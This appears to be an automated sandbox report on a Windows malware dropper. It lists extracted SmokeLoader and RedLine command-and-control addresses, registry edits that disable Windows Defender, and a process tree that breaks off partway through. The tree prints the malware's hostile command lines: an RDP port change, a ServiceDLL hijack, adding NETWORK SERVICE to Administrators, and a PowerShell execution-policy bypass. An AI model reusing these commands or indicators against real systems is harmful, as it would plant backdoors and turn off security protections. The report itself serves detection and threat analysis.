Analysis
max time kernel: 151s
max time network: 152s
platform: windows10_x64
resource: win10-en-20210920
submitted: 28-09-2021 23:35
Static task: static1
Behavioral task: behavioral1
Sample: e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe
Resource: win10-en-20210920
General
Target: e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe
Size: 180KB
MD5: e5cf31523f01f3791bf0d2dbf2a232c4
SHA1: d992d4c7ff035d4dc730620924625d58be4bd4a6
SHA256: e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e
SHA512: 83df9bc5351733b06adaa04f35bd3027c13ad995ea7bfde9c5ec60405c92bc5174718b80c54d1393917b3039efc26b09620807b5a995154902b3572ac3dda06c
Malware Config
Extracted
smokeloader
2020
http://naghenrietti1.top/
http://kimballiett2.top/
http://xadriettany3.top/
http://jebeccallis4.top/
http://nityanneron5.top/
http://umayaniela6.top/
http://lynettaram7.top/
http://sadineyalas8.top/
http://geenaldencia9.top/
http://aradysiusep10.top/
Extracted
redline
777777
193.56.146.60:18243
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource | yara_rule
behavioral1/memory/2512-169-0x0000000000400000-0x0000000000422000-memory.dmp | family_redline
behavioral1/memory/2512-170-0x000000000041C5D2-mapping.dmp | family_redline
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Turns off Windows Defender SpyNet reporting 2 TTPs
-
suricata: ET MALWARE Amadey CnC Check-In
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Nirsoft 3 IoCs
resource | yara_rule
behavioral1/files/0x000400000001abcb-149.dat | Nirsoft
behavioral1/files/0x000400000001abcb-150.dat | Nirsoft
behavioral1/files/0x000400000001abcb-159.dat | Nirsoft
Downloads MZ/PE file
-
Executes dropped EXE 15 IoCs
pid | Process
2772 | FE2C.exe
4080 | E5A.exe
2332 | 17A2.exe
2328 | AdvancedRun.exe
3920 | AdvancedRun.exe
2360 | 17A2.exe
2512 | 17A2.exe
2468 | 4952.exe
4112 | 6528.exe
4148 | 6528.tmp
4320 | 6528.exe
4388 | disksyncer.exe
4408 | 6528.tmp
4920 | SketchClient.exe
2892 | Zenar_protected.exe
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | FE2C.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Zenar_protected.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Zenar_protected.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | FE2C.exe
Deletes itself 1 IoCs
pid | Process
3040 | Process not Found
Drops startup file 1 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\netoptimize.lnk | disksyncer.exe
Loads dropped DLL 14 IoCs
pid | Process
2468 | 4952.exe
2468 | 4952.exe
4444 | MsiExec.exe
4444 | MsiExec.exe
4936 | MsiExec.exe
4936 | MsiExec.exe
4936 | MsiExec.exe
4936 | MsiExec.exe
4936 | MsiExec.exe
4936 | MsiExec.exe
2468 | 4952.exe
4388 | disksyncer.exe
4920 | SketchClient.exe
4388 | disksyncer.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource | yara_rule
behavioral1/files/0x000600000001abc4-120.dat | themida
behavioral1/memory/2772-122-0x0000000000BA0000-0x0000000000BA1000-memory.dmp | themida
Windows security modification 10 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | 17A2.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions | 17A2.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\17A2.exe = "0" | 17A2.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection | 17A2.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | 17A2.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" | 17A2.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" | 17A2.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | 17A2.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet | 17A2.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | 17A2.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | disksyncer.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Zenar_protected.exe = "C:\\ProgramData\\Zenar_protected.\\Zenar_protected.exe" | disksyncer.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 2 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | FE2C.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Zenar_protected.exe
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\L: | 4952.exe
File opened (read-only) | \??\P: | 4952.exe
File opened (read-only) | \??\M: | msiexec.exe
File opened (read-only) | \??\O: | msiexec.exe
File opened (read-only) | \??\H: | msiexec.exe
File opened (read-only) | \??\E: | 4952.exe
File opened (read-only) | \??\F: | 4952.exe
File opened (read-only) | \??\H: | 4952.exe
File opened (read-only) | \??\W: | 4952.exe
File opened (read-only) | \??\B: | msiexec.exe
File opened (read-only) | \??\N: | msiexec.exe
File opened (read-only) | \??\S: | 4952.exe
File opened (read-only) | \??\Y: | 4952.exe
File opened (read-only) | \??\X: | msiexec.exe
File opened (read-only) | \??\F: | msiexec.exe
File opened (read-only) | \??\S: | msiexec.exe
File opened (read-only) | \??\Z: | 4952.exe
File opened (read-only) | \??\N: | msiexec.exe
File opened (read-only) | \??\X: | msiexec.exe
File opened (read-only) | \??\B: | 4952.exe
File opened (read-only) | \??\R: | 4952.exe
File opened (read-only) | \??\J: | msiexec.exe
File opened (read-only) | \??\G: | 4952.exe
File opened (read-only) | \??\K: | 4952.exe
File opened (read-only) | \??\F: | msiexec.exe
File opened (read-only) | \??\L: | msiexec.exe
File opened (read-only) | \??\Q: | msiexec.exe
File opened (read-only) | \??\R: | msiexec.exe
File opened (read-only) | \??\T: | 4952.exe
File opened (read-only) | \??\G: | msiexec.exe
File opened (read-only) | \??\G: | msiexec.exe
File opened (read-only) | \??\Y: | msiexec.exe
File opened (read-only) | \??\V: | 4952.exe
File opened (read-only) | \??\E: | msiexec.exe
File opened (read-only) | \??\W: | msiexec.exe
File opened (read-only) | \??\I: | 4952.exe
File opened (read-only) | \??\Q: | 4952.exe
File opened (read-only) | \??\X: | 4952.exe
File opened (read-only) | \??\J: | msiexec.exe
File opened (read-only) | \??\V: | msiexec.exe
File opened (read-only) | \??\Q: | msiexec.exe
File opened (read-only) | \??\A: | 4952.exe
File opened (read-only) | \??\H: | msiexec.exe
File opened (read-only) | \??\K: | msiexec.exe
File opened (read-only) | \??\Z: | msiexec.exe
File opened (read-only) | \??\T: | msiexec.exe
File opened (read-only) | \??\J: | 4952.exe
File opened (read-only) | \??\N: | 4952.exe
File opened (read-only) | \??\U: | msiexec.exe
File opened (read-only) | \??\Y: | msiexec.exe
File opened (read-only) | \??\M: | msiexec.exe
File opened (read-only) | \??\O: | 4952.exe
File opened (read-only) | \??\B: | msiexec.exe
File opened (read-only) | \??\I: | msiexec.exe
File opened (read-only) | \??\L: | msiexec.exe
File opened (read-only) | \??\V: | msiexec.exe
File opened (read-only) | \??\M: | 4952.exe
File opened (read-only) | \??\P: | msiexec.exe
File opened (read-only) | \??\S: | msiexec.exe
File opened (read-only) | \??\W: | msiexec.exe
File opened (read-only) | \??\A: | msiexec.exe
File opened (read-only) | \??\O: | msiexec.exe
File opened (read-only) | \??\Z: | msiexec.exe
File opened (read-only) | \??\A: | msiexec.exe
Drops file in System32 directory 1 IoCs
description | ioc | Process
File created | C:\Windows\SysWOW64\rdpclip.exe | powershell.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
pid | Process
2772 | FE2C.exe
2332 | 17A2.exe
2332 | 17A2.exe
2332 | 17A2.exe
2332 | 17A2.exe
2332 | 17A2.exe
2332 | 17A2.exe
2332 | 17A2.exe
2332 | 17A2.exe
2332 | 17A2.exe
2332 | 17A2.exe
2332 | 17A2.exe
2332 | 17A2.exe
2332 | 17A2.exe
2332 | 17A2.exe
2332 | 17A2.exe
2892 | Zenar_protected.exe
Suspicious use of SetThreadContext 2 IoCs
description | pid | Process | procid_target
PID 2176 set thread context of 2380 | 2176 | e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe | 70
PID 2332 set thread context of 2512 | 2332 | 17A2.exe | 82
Drops file in Windows directory 22 IoCs
description | ioc | Process
File opened for modification | C:\Windows\Installer\MSI6015.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI6354.tmp | msiexec.exe
File created | C:\Windows\Installer\SourceHash{00CE1E75-E04C-4F83-824D-20B2297C955F} | msiexec.exe
File created | C:\Windows\branding\mediasvc.png | powershell.exe
File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
File created | C:\Windows\branding\mediasrv.png | powershell.exe
File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | WerFault.exe
File created | C:\Windows\Installer\35bdd.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI60F0.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI61EB.tmp | msiexec.exe
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
File opened for modification | C:\Windows\Installer\35bdd.msi | msiexec.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI5D82.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI5F58.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\ | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI6902.tmp | msiexec.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid | pid_target | Process | procid_target
2240 | 2332 | WerFault.exe | 74
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe
Modifies registry key 1 TTPs 1 IoCs
pid | Process
4600 | reg.exe
Modifies system certificate store 3 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | 4952.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = [data omitted] | 4952.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = [data omitted] | 4952.exe
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
2380 | e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe
2380 | e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
3040 | Process not Found
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid | Process
3040 | Process not Found
Suspicious behavior: LoadsDriver 1 IoCs
pid | Process
632 | Process not Found
Suspicious behavior: MapViewOfSection 1 IoCs
pid | Process
2380 | e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process
Token: SeShutdownPrivilege | 3040 | Process not Found
Token: SeCreatePagefilePrivilege | 3040 | Process not Found
Token: SeShutdownPrivilege | 3040 | Process not Found
Token: SeCreatePagefilePrivilege | 3040 | Process not Found
Token: SeShutdownPrivilege | 3040 | Process not Found
Token: SeCreatePagefilePrivilege | 3040 | Process not Found
Token: SeShutdownPrivilege | 3040 | Process not Found
Token: SeCreatePagefilePrivilege | 3040 | Process not Found
Token: SeDebugPrivilege | 2332 | 17A2.exe
Token: SeDebugPrivilege | 2328 | AdvancedRun.exe
Token: SeImpersonatePrivilege | 2328 | AdvancedRun.exe
Token: SeDebugPrivilege | 2772 | FE2C.exe
Token: SeDebugPrivilege | 3920 | AdvancedRun.exe
Token: SeImpersonatePrivilege | 3920 | AdvancedRun.exe
Token: SeRestorePrivilege | 2240 | WerFault.exe
Token: SeBackupPrivilege | 2240 | WerFault.exe
Token: SeBackupPrivilege | 2240 | WerFault.exe
Token: SeDebugPrivilege | 3840 | powershell.exe
Token: SeDebugPrivilege | 2240 | WerFault.exe
Token: SeDebugPrivilege | 3556 | powershell.exe
Token: SeShutdownPrivilege | 3040 | Process not Found
Token: SeCreatePagefilePrivilege | 3040 | Process not Found
Token: SeShutdownPrivilege | 3040 | Process not Found
Token: SeCreatePagefilePrivilege | 3040 | Process not Found
Token: SeShutdownPrivilege | 3040 | Process not Found
Token: SeCreatePagefilePrivilege | 3040 | Process not Found
Token: SeShutdownPrivilege | 3040 | Process not Found
Token: SeCreatePagefilePrivilege | 3040 | Process not Found
Token: SeShutdownPrivilege | 3040 | Process not Found
Token: SeCreatePagefilePrivilege | 3040 | Process not Found
Token: SeShutdownPrivilege | 3040 | Process not Found
Token: SeCreatePagefilePrivilege | 3040 | Process not Found
Token: SeShutdownPrivilege | 3040 | Process not Found
Token: SeCreatePagefilePrivilege | 3040 | Process not Found
Token: SeDebugPrivilege | 2512 | 17A2.exe
Token: SeDebugPrivilege | 3860 | powershell.exe
Token: SeSecurityPrivilege | 4276 | msiexec.exe
Token: SeCreateTokenPrivilege | 2468 | 4952.exe
Token: SeAssignPrimaryTokenPrivilege | 2468 | 4952.exe
Token: SeLockMemoryPrivilege | 2468 | 4952.exe
Token: SeIncreaseQuotaPrivilege | 2468 | 4952.exe
Token: SeMachineAccountPrivilege | 2468 | 4952.exe
Token: SeTcbPrivilege | 2468 | 4952.exe
Token: SeSecurityPrivilege | 2468 | 4952.exe
Token: SeTakeOwnershipPrivilege | 2468 | 4952.exe
Token: SeLoadDriverPrivilege | 2468 | 4952.exe
Token: SeSystemProfilePrivilege | 2468 | 4952.exe
Token: SeSystemtimePrivilege | 2468 | 4952.exe
Token: SeProfSingleProcessPrivilege | 2468 | 4952.exe
Token: SeIncBasePriorityPrivilege | 2468 | 4952.exe
Token: SeCreatePagefilePrivilege | 2468 | 4952.exe
Token: SeCreatePermanentPrivilege | 2468 | 4952.exe
Token: SeBackupPrivilege | 2468 | 4952.exe
Token: SeRestorePrivilege | 2468 | 4952.exe
Token: SeShutdownPrivilege | 2468 | 4952.exe
Token: SeDebugPrivilege | 2468 | 4952.exe
Token: SeAuditPrivilege | 2468 | 4952.exe
Token: SeSystemEnvironmentPrivilege | 2468 | 4952.exe
Token: SeChangeNotifyPrivilege | 2468 | 4952.exe
Token: SeRemoteShutdownPrivilege | 2468 | 4952.exe
Token: SeUndockPrivilege | 2468 | 4952.exe
Token: SeSyncAgentPrivilege | 2468 | 4952.exe
Token: SeEnableDelegationPrivilege | 2468 | 4952.exe
Token: SeManageVolumePrivilege | 2468 | 4952.exe
Suspicious use of FindShellTrayWindow 5 IoCs
pid | Process
4648 | msiexec.exe
4648 | msiexec.exe
4408 | 6528.tmp
3040 | Process not Found
3040 | Process not Found
Suspicious use of SendNotifyMessage 2 IoCs
pid | Process
3040 | Process not Found
3040 | Process not Found
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 2176 wrote to memory of 2380 | 2176 | e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe | 70
PID 2176 wrote to memory of 2380 | 2176 | e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe | 70
PID 2176 wrote to memory of 2380 | 2176 | e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe | 70
PID 2176 wrote to memory of 2380 | 2176 | e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe | 70
PID 2176 wrote to memory of 2380 | 2176 | e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe | 70
PID 2176 wrote to memory of 2380 | 2176 | e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe | 70
PID 3040 wrote to memory of 2772 | 3040 | Process not Found | 71
PID 3040 wrote to memory of 2772 | 3040 | Process not Found | 71
PID 3040 wrote to memory of 2772 | 3040 | Process not Found | 71
PID 3040 wrote to memory of 4080 | 3040 | Process not Found | 73
PID 3040 wrote to memory of 4080 | 3040 | Process not Found | 73
PID 3040 wrote to memory of 4080 | 3040 | Process not Found | 73
PID 3040 wrote to memory of 2332 | 3040 | Process not Found | 74
PID 3040 wrote to memory of 2332 | 3040 | Process not Found | 74
PID 3040 wrote to memory of 2332 | 3040 | Process not Found | 74
PID 2332 wrote to memory of 2328 | 2332 | 17A2.exe | 75
PID 2332 wrote to memory of 2328 | 2332 | 17A2.exe | 75
PID 2332 wrote to memory of 2328 | 2332 | 17A2.exe | 75
PID 2328 wrote to memory of 3920 | 2328 | AdvancedRun.exe | 76
PID 2328 wrote to memory of 3920 | 2328 | AdvancedRun.exe | 76
PID 2328 wrote to memory of 3920 | 2328 | AdvancedRun.exe | 76
PID 2332 wrote to memory of 3840 | 2332 | 17A2.exe | 79
PID 2332 wrote to memory of 3840 | 2332 | 17A2.exe | 79
PID 2332 wrote to memory of 3840 | 2332 | 17A2.exe | 79
PID 2332 wrote to memory of 2360 | 2332 | 17A2.exe | 81
PID 2332 wrote to memory of 2360 | 2332 | 17A2.exe | 81
PID 2332 wrote to memory of 2360 | 2332 | 17A2.exe | 81
PID 2332 wrote to memory of 2512 | 2332 | 17A2.exe | 82
PID 2332 wrote to memory of 2512 | 2332 | 17A2.exe | 82
PID 2332 wrote to memory of 2512 | 2332 | 17A2.exe | 82
PID 2332 wrote to memory of 2512 | 2332 | 17A2.exe | 82
PID 2332 wrote to memory of 2512 | 2332 | 17A2.exe | 82
PID 2332 wrote to memory of 2512 | 2332 | 17A2.exe | 82
PID 2332 wrote to memory of 2512 | 2332 | 17A2.exe | 82
PID 2332 wrote to memory of 2512 | 2332 | 17A2.exe | 82
PID 4080 wrote to memory of 3556 | 4080 | E5A.exe | 86
PID 4080 wrote to memory of 3556 | 4080 | E5A.exe | 86
PID 4080 wrote to memory of 3556 | 4080 | E5A.exe | 86
PID 3556 wrote to memory of 3756 | 3556 | powershell.exe | 88
PID 3556 wrote to memory of 3756 | 3556 | powershell.exe | 88
PID 3556 wrote to memory of 3756 | 3556 | powershell.exe | 88
PID 3756 wrote to memory of 1560 | 3756 | csc.exe | 89
PID 3756 wrote to memory of 1560 | 3756 | csc.exe | 89
PID 3756 wrote to memory of 1560 | 3756 | csc.exe | 89
PID 3040 wrote to memory of 2468 | 3040 | Process not Found | 90
PID 3040 wrote to memory of 2468 | 3040 | Process not Found | 90
PID 3040 wrote to memory of 2468 | 3040 | Process not Found | 90
PID 3556 wrote to memory of 3860 | 3556 | powershell.exe | 91
PID 3556 wrote to memory of 3860 | 3556 | powershell.exe | 91
PID 3556 wrote to memory of 3860 | 3556 | powershell.exe | 91
PID 4276 wrote to memory of 4444 | 4276 | msiexec.exe | 94
PID 4276 wrote to memory of 4444 | 4276 | msiexec.exe | 94
PID 4276 wrote to memory of 4444 | 4276 | msiexec.exe | 94
PID 2468 wrote to memory of 4648 | 2468 | 4952.exe | 95
PID 2468 wrote to memory of 4648 | 2468 | 4952.exe | 95
PID 2468 wrote to memory of 4648 | 2468 | 4952.exe | 95
PID 4276 wrote to memory of 4936 | 4276 | msiexec.exe | 96
PID 4276 wrote to memory of 4936 | 4276 | msiexec.exe | 96
PID 4276 wrote to memory of 4936 | 4276 | msiexec.exe | 96
PID 3040 wrote to memory of 4112 | 3040 | Process not Found | 97
PID 3040 wrote to memory of 4112 | 3040 | Process not Found | 97
PID 3040 wrote to memory of 4112 | 3040 | Process not Found | 97
PID 4112 wrote to memory of 4148 | 4112 | 6528.exe | 98
PID 4112 wrote to memory of 4148 | 4112 | 6528.exe | 98
Processes
-
[1] C:\Users\Admin\AppData\Local\Temp\e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe"
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID: 2176
  [2] C:\Users\Admin\AppData\Local\Temp\e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe"
      - Checks SCSI registry key(s)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      PID: 2380
[1] C:\Users\Admin\AppData\Local\Temp\FE2C.exe
    command line: C:\Users\Admin\AppData\Local\Temp\FE2C.exe
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of AdjustPrivilegeToken
    PID: 2772
[1] C:\Users\Admin\AppData\Local\Temp\E5A.exe
    command line: C:\Users\Admin\AppData\Local\Temp\E5A.exe
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID: 4080
  [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      - Drops file in System32 directory
      - Drops file in Windows directory
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 3556
    [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qvqav023\qvqav023.cmdline"
        - Suspicious use of WriteProcessMemory
        PID: 3756
      [4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3F5C.tmp" "c:\Users\Admin\AppData\Local\Temp\qvqav023\CSC910D04A1CFB74B189A724FDF7928163.TMP"
          PID: 1560
    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        - Suspicious use of AdjustPrivilegeToken
        PID: 3860
    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        PID: 4960
    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        PID: 4972
    [3] C:\Windows\SysWOW64\reg.exe
        command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
        PID: 4544
    [3] C:\Windows\SysWOW64\reg.exe
        command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        - Modifies registry key
        PID: 4600
    [3] C:\Windows\SysWOW64\reg.exe
        command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
        PID: 4628
    [3] C:\Windows\SysWOW64\net.exe
        command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        PID: 4824
      [4] C:\Windows\SysWOW64\net1.exe
          command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
          PID: 4852
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        PID: 4908
      [4] C:\Windows\SysWOW64\cmd.exe
          command line: cmd /c net start rdpdr
          PID: 4456
        [5] C:\Windows\SysWOW64\net.exe
            command line: net start rdpdr
            PID: 4916
          [6] C:\Windows\SysWOW64\net1.exe
              command line: C:\Windows\system32\net1 start rdpdr
              PID: 4340
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        PID: 4992
      [4] C:\Windows\SysWOW64\cmd.exe
          command line: cmd /c net start TermService
          PID: 4924
        [5] C:\Windows\SysWOW64\net.exe
            command line: net start TermService
            PID: 5024
          [6] C:\Windows\SysWOW64\net1.exe
              command line: C:\Windows\system32\net1 start TermService
              PID: 5044
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
        PID: 2772
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
        PID: 4988
[1] C:\Users\Admin\AppData\Local\Temp\17A2.exe
    command line: C:\Users\Admin\AppData\Local\Temp\17A2.exe
    - Executes dropped EXE
    - Windows security modification
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 2332
  [2] C:\Users\Admin\AppData\Local\Temp\9dac25bf-828f-494e-be2f-32046ec357c3\AdvancedRun.exe
